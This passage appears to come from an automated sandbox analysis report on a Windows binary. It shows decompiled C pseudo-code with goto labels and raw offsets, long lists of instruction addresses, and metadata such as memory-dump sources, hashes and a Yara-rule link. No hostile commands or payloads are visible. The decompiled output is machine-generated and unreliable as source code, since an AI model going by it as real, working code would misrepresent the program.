																		if( *((char*)(_t520 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0xf)) = 0;
																		_t523 = E00C39E6B(_t683 + 0x10f6);
																		__eflags = _t523;
																		if(_t523 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0xf));
																			if( *((char*)(_t706 - 0xf)) == 0) {
																				_t601 =  *(_t706 + 0xf);
																				goto L93;
																			}
																			L82:
																			_t601 = 0;
																			 *(_t706 + 0xf) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0xf));
																		if( *((char*)(_t706 - 0xf)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t574 + 0x32c0);
																		_t160 = _t706 - 0xf; // 0x7f1
																		E00C3919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t574 + 0x3341));
																	if( *((char*)(_t574 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t132 = _t706 - 0x2c; // 0x7d4
																	_t531 = E00C4F3CA(_t574 + 0x3342, _t132, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t531;
																	if(_t531 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t574 + 0x6cc4);
																	if( *(_t574 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t683 + 0x10f4));
																	_t136 = _t706 - 0x113c; // -2364
																	_push(_t574 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E00C36BF5(__eflags);
																		E00C36E03(0xc700e0, 0xb);
																		__eflags = 0;
																		 *(_t706 + 0xf) = 0;
																		goto L73;
																	}
																	_push(0x7d);
																	E00C36BF5(__eflags);
																	E00C3E797( *(_t683 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t141 = _t706 - 0x13c; // 0x6c4
																	L00C3E724(_t141);
																}
															}
															E00C36E03(0xc700e0, 2);
															_t543 = E00C31E3B(_t574);
															__eflags =  *((char*)(_t574 + 0x6cb4));
															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t100 = _t706 - 0x2198; // -6552
														_t545 = E00C37BBB(_t100, _t574 + 0x32c0);
														__eflags = _t545;
														if(_t545 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 + 0xf) = 0;
															goto L61;
														}
														_t102 = _t706 - 0x2198; // -6552
														_t547 = E00C37B9D(_t102, _t683);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t692 - _t668;
													if(_t692 != _t668) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t398 + 0x6154));
												if( *((char*)(_t398 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t683 + 0x10f6);
											if( *(_t683 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 + 0xf) = 1;
											__eflags =  *(_t574 + 0x3318);
											if( *(_t574 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t692 - _t387;
										_t388 = 1;
										if(_t692 != _t387) {
											goto L46;
										}
										goto L45;
									}
									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
									 *(_t706 + 0xb) = _t671;
									 *(_t706 + 0xc) = _t671;
									__eflags = _t671;
									if(_t671 == 0) {
										goto L214;
									} else {
										_t667 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t683 + 0xf1));
								if( *((char*)(_t683 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t574 + 0x32e0) = _t665;
								 *(_t574 + 0x32e4) = _t665;
								goto L26;
							}
							__eflags =  *(_t574 + 0x32e0) - _t665;
							if( *(_t574 + 0x32e0) >= _t665) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t574 + 0x32d8) = _t665;
							 *(_t574 + 0x32dc) = _t665;
							goto L22;
						}
						__eflags =  *(_t574 + 0x32d8) - _t665;
						if( *(_t574 + 0x32d8) >= _t665) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t690 - 3;
					if(_t690 != 3) {
						L10:
						__eflags = _t690 - 5;
						if(_t690 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t574 + 0x45ac));
						if( *((char*)(_t574 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t683 + 0x10);
						_push(_t574);
						_t564 = E00C480D0(_t665);
						__eflags = _t564;
						if(_t564 != 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
							goto L15;
						} else {
							E00C36E03(0xc700e0, 1);
							goto L219;
						}
					}
					__eflags =  *(_t683 + 0x10f5);
					if( *(_t683 + 0x10f5) == 0) {
						goto L217;
					} else {
						E00C379A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
					L4:
					_t393 = 0;
					goto L17;
				}
				_push(_t370);
				_push(0);
				_push(_t683 + 0x10);
				_push(_t574);
				if(E00C480D0(0) != 0) {
					_t665 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00C36E03(0xc700e0, 1);
					goto L4;
				}
			}
























































































                                            0x00c383c0
                                            0x00c383c5
                                            0x00c383cf
                                            0x00c383d5
                                            0x00c383d8
                                            0x00c383db
                                            0x00c383dd
                                            0x00c383e3
                                            0x00c383ea
                                            0x00c383f0
                                            0x00c3841c
                                            0x00c3841d
                                            0x00c38423
                                            0x00c38426
                                            0x00c384b5
                                            0x00c384bb
                                            0x00c384c1
                                            0x00c384d9
                                            0x00c384d9
                                            0x00c384df
                                            0x00c384f7
                                            0x00c384f7
                                            0x00c384fa
                                            0x00c38500
                                            0x00c3851d
                                            0x00c38522
                                            0x00c38526
                                            0x00c38530
                                            0x00c3853b
                                            0x00c38540
                                            0x00c38542
                                            0x00c38545
                                            0x00c38548
                                            0x00c3854a
                                            0x00c3854c
                                            0x00c38550
                                            0x00c38552
                                            0x00c38554
                                            0x00c38554
                                            0x00c38550
                                            0x00c3855c
                                            0x00c38561
                                            0x00c38562
                                            0x00c3856f
                                            0x00c38570
                                            0x00c38578
                                            0x00c3857f
                                            0x00c38582
                                            0x00c385d9
                                            0x00c385de
                                            0x00c385e0
                                            0x00c385e2
                                            0x00c385e8
                                            0x00c385ee
                                            0x00c385f2
                                            0x00c385f2
                                            0x00c385f2
                                            0x00c385f2
                                            0x00c38584
                                            0x00c38587
                                            0x00c3858d
                                            0x00c3858f
                                            0x00c38591
                                            0x00c38595
                                            0x00c38597
                                            0x00c3859e
                                            0x00c385a3
                                            0x00c385a4
                                            0x00c385ab
                                            0x00c385b0
                                            0x00c385ba
                                            0x00c385bc
                                            0x00c385d2
                                            0x00c385be
                                            0x00c385c0
                                            0x00c385c7
                                            0x00c385c9
                                            0x00c385c9
                                            0x00c385bc
                                            0x00c38595
                                            0x00c3858f
                                            0x00c385fb
                                            0x00c38600
                                            0x00c38618
                                            0x00c38622
                                            0x00c38625
                                            0x00c38627
                                            0x00c3862b
                                            0x00c3862e
                                            0x00c38631
                                            0x00c38634
                                            0x00c3864c
                                            0x00c3864f
                                            0x00c38654
                                            0x00c3865a
                                            0x00c3865b
                                            0x00c3865d
                                            0x00c38666
                                            0x00c38666
                                            0x00c38668
                                            0x00c3866b
                                            0x00c38675
                                            0x00c3867c
                                            0x00c38681
                                            0x00c38683
                                            0x00c39042
                                            0x00c39042
                                            0x00c384a2
                                            0x00c384a3
                                            0x00c384a8
                                            0x00c384b2
                                            0x00c384b2
                                            0x00c38697
                                            0x00c3869a
                                            0x00c386a2
                                            0x00c386a9
                                            0x00c386ac
                                            0x00c386c3
                                            0x00c386c3
                                            0x00c386c6
                                            0x00c386c6
                                            0x00c386cb
                                            0x00c386ce
                                            0x00c386d5
                                            0x00c386d6
                                            0x00c386d9
                                            0x00c386dc
                                            0x00c386e7
                                            0x00c386e7
                                            0x00c386ea
                                            0x00c386f1
                                            0x00c386f1
                                            0x00c386f7
                                            0x00c386fe
                                            0x00c386ff
                                            0x00c3870d
                                            0x00c38712
                                            0x00c38714
                                            0x00c3874c
                                            0x00c3874f
                                            0x00c3875b
                                            0x00c3875b
                                            0x00c3875b
                                            0x00c3875e
                                            0x00c3875e
                                            0x00c38768
                                            0x00c3876d
                                            0x00c3876f
                                            0x00c38793
                                            0x00c38793
                                            0x00c3879a
                                            0x00000000
                                            0x00000000
                                            0x00c3879c
                                            0x00c387a6
                                            0x00c387ab
                                            0x00c387ad
                                            0x00c3888c
                                            0x00000000
                                            0x00c3888c
                                            0x00c387b3
                                            0x00c387b6
                                            0x00c387c4
                                            0x00c387c5
                                            0x00c387c5
                                            0x00c387c7
                                            0x00c387d0
                                            0x00c387d3
                                            0x00c387df
                                            0x00c387f2
                                            0x00c387fc
                                            0x00c3880e
                                            0x00c38813
                                            0x00c3881a
                                            0x00c388b0
                                            0x00c388b0
                                            0x00c388b4
                                            0x00c388ba
                                            0x00c388bf
                                            0x00c388c5
                                            0x00c388ca
                                            0x00c388d0
                                            0x00c388d7
                                            0x00c388dc
                                            0x00c388dd
                                            0x00c388df
                                            0x00c38972
                                            0x00c38974
                                            0x00c38979
                                            0x00c3897b
                                            0x00c389cd
                                            0x00c389d0
                                            0x00c389d2
                                            0x00c389f6
                                            0x00c389f9
                                            0x00c389f9
                                            0x00c38a00
                                            0x00c38a38
                                            0x00c38a3a
                                            0x00c38ff7
                                            0x00c38ff7
                                            0x00c38ffb
                                            0x00c39001
                                            0x00c39006
                                            0x00c3900a
                                            0x00c3900d
                                            0x00c39010
                                            0x00c39012
                                            0x00c39012
                                            0x00c39012
                                            0x00c39012
                                            0x00c39018
                                            0x00c39018
                                            0x00c3901c
                                            0x00000000
                                            0x00000000
                                            0x00c3901e
                                            0x00c39020
                                            0x00c384a0
                                            0x00c384a0
                                            0x00000000
                                            0x00c384a0
                                            0x00c39026
                                            0x00c3902c
                                            0x00c3903a
                                            0x00c3903c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3903c
                                            0x00c3902e
                                            0x00c39030
                                            0x00000000
                                            0x00c39030
                                            0x00c38a40
                                            0x00c38a40
                                            0x00c38a43
                                            0x00c38a4a
                                            0x00c38a5c
                                            0x00c38a5c
                                            0x00c38a5f
                                            0x00c38a61
                                            0x00c38aa8
                                            0x00c38aa8
                                            0x00c38aac
                                            0x00c38aae
                                            0x00c38ab6
                                            0x00c38ab6
                                            0x00c38aca
                                            0x00c38ad0
                                            0x00c38ad6
                                            0x00c38adc
                                            0x00c38aed
                                            0x00c38b03
                                            0x00c38b0e
                                            0x00c38b17
                                            0x00c38b1a
                                            0x00c38b21
                                            0x00c38b27
                                            0x00c38b2c
                                            0x00c38b2f
                                            0x00c38b31
                                            0x00c38b34
                                            0x00c38b37
                                            0x00c38b3a
                                            0x00c38b3d
                                            0x00c38b40
                                            0x00c38b42
                                            0x00c38be5
                                            0x00c38be5
                                            0x00c38be8
                                            0x00c38bef
                                            0x00c38bf6
                                            0x00c38bfa
                                            0x00c38c10
                                            0x00c38c12
                                            0x00c38c12
                                            0x00c38c13
                                            0x00c38c13
                                            0x00c38c17
                                            0x00c38c1a
                                            0x00c38c1d
                                            0x00c38c20
                                            0x00c38d2c
                                            0x00c38d33
                                            0x00c38d35
                                            0x00c38d3c
                                            0x00c38d66
                                            0x00c38d6b
                                            0x00c38d7d
                                            0x00c38d83
                                            0x00c38d85
                                            0x00c38d8b
                                            0x00c38da5
                                            0x00c38d3e
                                            0x00c38d3e
                                            0x00c38d44
                                            0x00c38d4a
                                            0x00c38d4b
                                            0x00c38d4b
                                            0x00c38d3c
                                            0x00c38daa
                                            0x00c38dac
                                            0x00c38db1
                                            0x00c38db8
                                            0x00c38dea
                                            0x00c38dea
                                            0x00c38dea
                                            0x00c38dec
                                            0x00c38dee
                                            0x00c38dee
                                            0x00c38df5
                                            0x00c38dff
                                            0x00c38e06
                                            0x00c38e25
                                            0x00c38e25
                                            0x00c38e29
                                            0x00c38e2c
                                            0x00c38e8d
                                            0x00c38e8d
                                            0x00c38e91
                                            0x00c38e94
                                            0x00c38ea7
                                            0x00c38ea7
                                            0x00c38ea7
                                            0x00c38ea9
                                            0x00c38ea9
                                            0x00c38ead
                                            0x00000000
                                            0x00000000
                                            0x00c38eb3
                                            0x00c38eb6
                                            0x00c38eba
                                            0x00c38ec6
                                            0x00c38ec6
                                            0x00c38eca
                                            0x00c38ee5
                                            0x00c38ee5
                                            0x00c38ee7
                                            0x00c38efc
                                            0x00c38efc
                                            0x00c38efe
                                            0x00c38fc2
                                            0x00c38fc2
                                            0x00c38fc5
                                            0x00c38fcc
                                            0x00c38fd4
                                            0x00c38fdb
                                            0x00c38fe0
                                            0x00c38fe2
                                            0x00c38feb
                                            0x00c38feb
                                            0x00c38fe2
                                            0x00c38ff0
                                            0x00000000
                                            0x00c38ff0
                                            0x00c38f04
                                            0x00c38f09
                                            0x00c38f0b
                                            0x00c38f0e
                                            0x00c38f14
                                            0x00c38f14
                                            0x00c38f16
                                            0x00c38f28
                                            0x00c38f28
                                            0x00c38f2e
                                            0x00c38f33
                                            0x00c38f3c
                                            0x00c38f50
                                            0x00c38f57
                                            0x00c38f6a
                                            0x00c38f6c
                                            0x00c38f75
                                            0x00c38f7a
                                            0x00c38f80
                                            0x00c38f8f
                                            0x00c38fa2
                                            0x00c38fb5
                                            0x00c38fb7
                                            0x00c38fba
                                            0x00c38fbf
                                            0x00000000
                                            0x00c38fbf
                                            0x00c38f18
                                            0x00c38f1e
                                            0x00000000
                                            0x00000000
                                            0x00c38f20
                                            0x00c38f26
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38f26
                                            0x00c38f10
                                            0x00c38f12
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38f12
                                            0x00c38ee9
                                            0x00c38eec
                                            0x00c38ef3
                                            0x00000000
                                            0x00000000
                                            0x00c38ef9
                                            0x00000000
                                            0x00c38ef9
                                            0x00c38ecc
                                            0x00c38ece
                                            0x00000000
                                            0x00000000
                                            0x00c38ed0
                                            0x00c38ed7
                                            0x00000000
                                            0x00000000
                                            0x00c38edd
                                            0x00c38edf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38edf
                                            0x00c38ebc
                                            0x00c38ec0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38ec0
                                            0x00c38e96
                                            0x00c38e9d
                                            0x00000000
                                            0x00000000
                                            0x00c38e9f
                                            0x00c38ea1
                                            0x00000000
                                            0x00000000
                                            0x00c38ea3
                                            0x00000000
                                            0x00c38ea3
                                            0x00c38e2e
                                            0x00c38e32
                                            0x00000000
                                            0x00000000
                                            0x00c38e34
                                            0x00c38e36
                                            0x00000000
                                            0x00000000
                                            0x00c38e38
                                            0x00c38e3e
                                            0x00c38e68
                                            0x00c38e68
                                            0x00c38e72
                                            0x00c38e73
                                            0x00c38e75
                                            0x00c38e75
                                            0x00c38e81
                                            0x00c38e85
                                            0x00c38e8a
                                            0x00000000
                                            0x00c38e8a
                                            0x00c38e40
                                            0x00c38e46
                                            0x00c38e50
                                            0x00c38e50
                                            0x00c38e57
                                            0x00000000
                                            0x00000000
                                            0x00c38e59
                                            0x00c38e63
                                            0x00c38e64
                                            0x00000000
                                            0x00c38e64
                                            0x00c38e48
                                            0x00c38e4e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38e4e
                                            0x00c38e08
                                            0x00c38e0e
                                            0x00000000
                                            0x00000000
                                            0x00c38e10
                                            0x00c38e1a
                                            0x00c38e1a
                                            0x00c38e1c
                                            0x00c38e1e
                                            0x00c38e1e
                                            0x00000000
                                            0x00c38e1c
                                            0x00c38e12
                                            0x00c38e18
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38e18
                                            0x00c38df7
                                            0x00000000
                                            0x00c38df7
                                            0x00c38dcf
                                            0x00c38ddb
                                            0x00c38de0
                                            0x00c38de2
                                            0x00000000
                                            0x00000000
                                            0x00c38de4
                                            0x00c38de6
                                            0x00000000
                                            0x00c38de6
                                            0x00c38c26
                                            0x00c38c2c
                                            0x00c38c2f
                                            0x00c38c98
                                            0x00c38c9d
                                            0x00c38cae
                                            0x00c38cb3
                                            0x00c38cb6
                                            0x00c38cb8
                                            0x00c38d05
                                            0x00c38d05
                                            0x00c38d08
                                            0x00c38d08
                                            0x00c38d0f
                                            0x00c38c64
                                            0x00c38c64
                                            0x00c38c66
                                            0x00c38d22
                                            0x00c38d22
                                            0x00c38d22
                                            0x00c38d24
                                            0x00c38d24
                                            0x00000000
                                            0x00c38d24
                                            0x00c38c6c
                                            0x00c38c6c
                                            0x00c38c6e
                                            0x00000000
                                            0x00000000
                                            0x00c38c76
                                            0x00000000
                                            0x00c38c76
                                            0x00c38d15
                                            0x00c38d17
                                            0x00000000
                                            0x00000000
                                            0x00c38c60
                                            0x00c38c60
                                            0x00000000
                                            0x00c38c60
                                            0x00c38cba
                                            0x00c38cc2
                                            0x00000000
                                            0x00000000
                                            0x00c38cc4
                                            0x00c38cca
                                            0x00c38cd6
                                            0x00c38cd7
                                            0x00c38cda
                                            0x00c38ce8
                                            0x00c38ce9
                                            0x00c38cf0
                                            0x00c38cdc
                                            0x00c38cdc
                                            0x00c38cdc
                                            0x00c38cf5
                                            0x00c38cf5
                                            0x00c38cf8
                                            0x00c38cfa
                                            0x00c38c5d
                                            0x00c38c5d
                                            0x00000000
                                            0x00c38c5d
                                            0x00c38d00
                                            0x00000000
                                            0x00c38d00
                                            0x00c38c31
                                            0x00c38c34
                                            0x00000000
                                            0x00000000
                                            0x00c38c36
                                            0x00c38c38
                                            0x00c38c7c
                                            0x00c38c7c
                                            0x00c38c7e
                                            0x00000000
                                            0x00000000
                                            0x00c38c8a
                                            0x00c38c91
                                            0x00000000
                                            0x00c38c91
                                            0x00c38c3a
                                            0x00c38c3d
                                            0x00000000
                                            0x00000000
                                            0x00c38c3f
                                            0x00c38c42
                                            0x00000000
                                            0x00000000
                                            0x00c38c51
                                            0x00c38c56
                                            0x00c38c58
                                            0x00c38c5a
                                            0x00000000
                                            0x00c38c5a
                                            0x00c38bfc
                                            0x00c38bfe
                                            0x00000000
                                            0x00000000
                                            0x00c38c02
                                            0x00c38c03
                                            0x00c38c07
                                            0x00000000
                                            0x00000000
                                            0x00c38c0b
                                            0x00c38c0c
                                            0x00000000
                                            0x00c38c0c
                                            0x00c38b48
                                            0x00c38b4e
                                            0x00000000
                                            0x00000000
                                            0x00c38b54
                                            0x00c38b5a
                                            0x00c38b60
                                            0x00c38b62
                                            0x00c38be2
                                            0x00c38be2
                                            0x00000000
                                            0x00c38be2
                                            0x00c38b64
                                            0x00c38b6e
                                            0x00c38b6e
                                            0x00c38b7e
                                            0x00c38b81
                                            0x00c38b83
                                            0x00c38bdd
                                            0x00c38bdd
                                            0x00c38be0
                                            0x00c38be0
                                            0x00000000
                                            0x00c38be0
                                            0x00c38b85
                                            0x00c38b8b
                                            0x00c38b8d
                                            0x00c38b8f
                                            0x00c38bb4
                                            0x00c38bba
                                            0x00c38bc6
                                            0x00c38bd1
                                            0x00c38bda
                                            0x00000000
                                            0x00c38bda
                                            0x00c38b91
                                            0x00c38b9b
                                            0x00c38b9d
                                            0x00c38ba2
                                            0x00c38ba8
                                            0x00000000
                                            0x00000000
                                            0x00c38baa
                                            0x00000000
                                            0x00000000
                                            0x00c38bac
                                            0x00c38bb2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38bb2
                                            0x00c38b93
                                            0x00c38b99
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38b99
                                            0x00c38b87
                                            0x00c38b89
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38b89
                                            0x00c38b66
                                            0x00c38b6c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38b6c
                                            0x00c38ab0
                                            0x00c38ab0
                                            0x00c38ab0
                                            0x00c38ab0
                                            0x00000000
                                            0x00c38ab0
                                            0x00c38a67
                                            0x00c38a6a
                                            0x00c38a6b
                                            0x00c38a6e
                                            0x00c38a70
                                            0x00c38a7b
                                            0x00c38a7d
                                            0x00c38a8c
                                            0x00c38a9e
                                            0x00c38a9e
                                            0x00c38a7d
                                            0x00000000
                                            0x00c38a6e
                                            0x00c38a4c
                                            0x00c38a53
                                            0x00c38a5a
                                            0x00c38aa5
                                            0x00000000
                                            0x00c38aa5
                                            0x00000000
                                            0x00c38a5a
                                            0x00c38a06
                                            0x00c38a09
                                            0x00c38a10
                                            0x00c38a17
                                            0x00c38a1c
                                            0x00c38a1e
                                            0x00000000
                                            0x00000000
                                            0x00c38a20
                                            0x00c38a22
                                            0x00c38a25
                                            0x00c38a25
                                            0x00c38a2b
                                            0x00c38a30
                                            0x00000000
                                            0x00c38a30
                                            0x00c389d4
                                            0x00c389dd
                                            0x00c389de
                                            0x00c389e3
                                            0x00c389e6
                                            0x00c389e8
                                            0x00c389f0
                                            0x00c389f0
                                            0x00c389f2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c389f4
                                            0x00c3897d
                                            0x00c38981
                                            0x00c38987
                                            0x00c3898a
                                            0x00c3898e
                                            0x00c38996
                                            0x00c38997
                                            0x00c3899a
                                            0x00c389a2
                                            0x00c389a3
                                            0x00c389a6
                                            0x00c389a8
                                            0x00c389ae
                                            0x00c389b4
                                            0x00c389b6
                                            0x00c389bc
                                            0x00c389c3
                                            0x00c389c6
                                            0x00c389c6
                                            0x00c389b4
                                            0x00c389a6
                                            0x00c3899a
                                            0x00c3898e
                                            0x00000000
                                            0x00c38981
                                            0x00c388e5
                                            0x00c388e8
                                            0x00000000
                                            0x00000000
                                            0x00c388ee
                                            0x00c388f1
                                            0x00c388f4
                                            0x00c388f6
                                            0x00000000
                                            0x00000000
                                            0x00c388fc
                                            0x00c388ff
                                            0x00000000
                                            0x00000000
                                            0x00c38905
                                            0x00c38908
                                            0x00c3890f
                                            0x00000000
                                            0x00000000
                                            0x00c38917
                                            0x00c38921
                                            0x00c38926
                                            0x00c38928
                                            0x00c3895f
                                            0x00c3895f
                                            0x00c38963
                                            0x00c389ed
                                            0x00000000
                                            0x00c389ed
                                            0x00c38969
                                            0x00c3896b
                                            0x00c3896d
                                            0x00000000
                                            0x00c3896d
                                            0x00c3892a
                                            0x00c3892e
                                            0x00000000
                                            0x00000000
                                            0x00c38930
                                            0x00c38938
                                            0x00c38939
                                            0x00c38940
                                            0x00c3895a
                                            0x00000000
                                            0x00c3895a
                                            0x00c38820
                                            0x00c38827
                                            0x00000000
                                            0x00000000
                                            0x00c3882f
                                            0x00c3883a
                                            0x00c3883f
                                            0x00c38842
                                            0x00c38844
                                            0x00000000
                                            0x00000000
                                            0x00c38846
                                            0x00c3884d
                                            0x00000000
                                            0x00000000
                                            0x00c3884f
                                            0x00c38856
                                            0x00c38860
                                            0x00c38861
                                            0x00c38898
                                            0x00c3889a
                                            0x00c388a6
                                            0x00c388ab
                                            0x00c388ad
                                            0x00000000
                                            0x00c388ad
                                            0x00c38863
                                            0x00c38865
                                            0x00c38873
                                            0x00c38878
                                            0x00c3887c
                                            0x00c38882
                                            0x00c38882
                                            0x00c38793
                                            0x00c38778
                                            0x00c3877f
                                            0x00c38784
                                            0x00c3878b
                                            0x00000000
                                            0x00c3878b
                                            0x00c3871d
                                            0x00c38723
                                            0x00c38728
                                            0x00c3872a
                                            0x00000000
                                            0x00000000
                                            0x00c3872c
                                            0x00c38733
                                            0x00c38745
                                            0x00c38747
                                            0x00000000
                                            0x00c38747
                                            0x00c38736
                                            0x00c3873c
                                            0x00c38741
                                            0x00c38743
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38743
                                            0x00c386ec
                                            0x00c386ef
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c386ef
                                            0x00c386de
                                            0x00c386e5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c386e5
                                            0x00c386ae
                                            0x00c386b5
                                            0x00000000
                                            0x00000000
                                            0x00c386b7
                                            0x00c386bb
                                            0x00c386c1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c386c1
                                            0x00c3865f
                                            0x00c38662
                                            0x00c38664
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38664
                                            0x00c38636
                                            0x00c3863c
                                            0x00c3863f
                                            0x00c38642
                                            0x00c38644
                                            0x00000000
                                            0x00c3864a
                                            0x00c3864a
                                            0x00c3864a
                                            0x00000000
                                            0x00c3864a
                                            0x00c38644
                                            0x00c38508
                                            0x00c3850e
                                            0x00000000
                                            0x00000000
                                            0x00c38510
                                            0x00c38517
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c38517
                                            0x00c384e1
                                            0x00c384eb
                                            0x00c384eb
                                            0x00c384f1
                                            0x00000000
                                            0x00c384f1
                                            0x00c384e3
                                            0x00c384e9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c384e9
                                            0x00c384c3
                                            0x00c384cd
                                            0x00c384cd
                                            0x00c384d3
                                            0x00000000
                                            0x00c384d3
                                            0x00c384c5
                                            0x00c384cb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c384cb
                                            0x00c3842c
                                            0x00c3842f
                                            0x00c3844e
                                            0x00c3844e
                                            0x00c38451
                                            0x00000000
                                            0x00000000
                                            0x00c38457
                                            0x00c3845e
                                            0x00000000
                                            0x00000000
                                            0x00c38469
                                            0x00c3846a
                                            0x00c3846e
                                            0x00c3846f
                                            0x00c38470
                                            0x00c38475
                                            0x00c38477
                                            0x00c3848c
                                            0x00c3849d
                                            0x00000000
                                            0x00c38479
                                            0x00c38480
                                            0x00000000
                                            0x00c38480
                                            0x00c38477
                                            0x00c38431
                                            0x00c38438
                                            0x00000000
                                            0x00c3843e
                                            0x00c38449
                                            0x00000000
                                            0x00c38449
                                            0x00c38438
                                            0x00c383f5
                                            0x00c38413
                                            0x00c38413
                                            0x00000000
                                            0x00c38413
                                            0x00c383f7
                                            0x00c383f8
                                            0x00c383fc
                                            0x00c383fd
                                            0x00c38405
                                            0x00c3841a
                                            0x00c3841a
                                            0x00000000
                                            0x00c38407
                                            0x00c3840e
                                            0x00000000
                                            0x00c3840e

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog_memcmp
                                            • String ID:
                                            • API String ID: 3004599000-0
                                            • Opcode ID: 0635f4a714732d4d21eaaf071a317027f4c8d22a7b3088eefd5a7a35716cbac9
                                            • Instruction ID: ab435abe7d0fbb253853a140170a3d77d692b514b625ac1d6ad1511db5b45394
                                            • Opcode Fuzzy Hash: 0635f4a714732d4d21eaaf071a317027f4c8d22a7b3088eefd5a7a35716cbac9
                                            • Instruction Fuzzy Hash: 5782D971924385AEDF15DF64C885BFAB7A9BF05300F0841BAF8699B142DB315B4CDB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4E643, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4E643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00C4E64F); // executed
				return _t1;
			}




                                            0x00c4e648
                                            0x00c4e64e

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,00C4E084), ref: 00C4E648
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f8e21460349b5263ce62a1ac53a3d00b791fa6ce05f06eab9fd5973c9ba04f3a
